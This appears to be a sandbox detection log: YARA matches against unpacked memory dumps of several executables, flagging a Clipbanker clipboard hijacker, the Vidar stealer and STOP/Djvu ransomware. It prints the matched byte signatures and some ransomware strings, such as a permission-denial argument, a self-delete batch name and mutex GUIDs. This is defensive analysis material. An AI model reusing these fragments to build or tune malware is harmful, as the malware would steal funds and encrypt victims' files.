26.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
26.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
12.2.build3.exe.23215a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
12.2.build3.exe.23215a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
28.2.mstsca.exe.24215a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
28.2.mstsca.exe.24215a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
20.2.mstsca.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
20.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
20.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
30.2.mstsca.exe.8a15a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
30.2.mstsca.exe.8a15a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
16.2.build3.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
16.2.build3.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
16.2.build3.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
28.2.mstsca.exe.24215a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
28.2.mstsca.exe.24215a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
28.2.mstsca.exe.24215a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
31.2.mstsca.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
31.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
31.2.mstsca.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
31.2.mstsca.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
31.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
31.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
33.2.mstsca.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
33.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
33.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
26.2.mstsca.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
26.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
26.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
30.2.mstsca.exe.8a15a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
30.2.mstsca.exe.8a15a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
30.2.mstsca.exe.8a15a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
16.2.build3.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
16.2.build3.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
16.2.build3.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
8.2.build2.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
19.2.mstsca.exe.9715a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
19.2.mstsca.exe.9715a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
19.2.mstsca.exe.9715a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
29.2.mstsca.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
29.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
29.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
20.2.mstsca.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
20.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
20.2.mstsca.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
7.2.build2.exe.36715a0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
7.2.build2.exe.36715a0.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
32.2.mstsca.exe.8915a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
32.2.mstsca.exe.8915a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
32.2.mstsca.exe.8915a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
11.2.mJVVW85CnW.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.2.mJVVW85CnW.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
11.2.mJVVW85CnW.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
29.2.mstsca.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
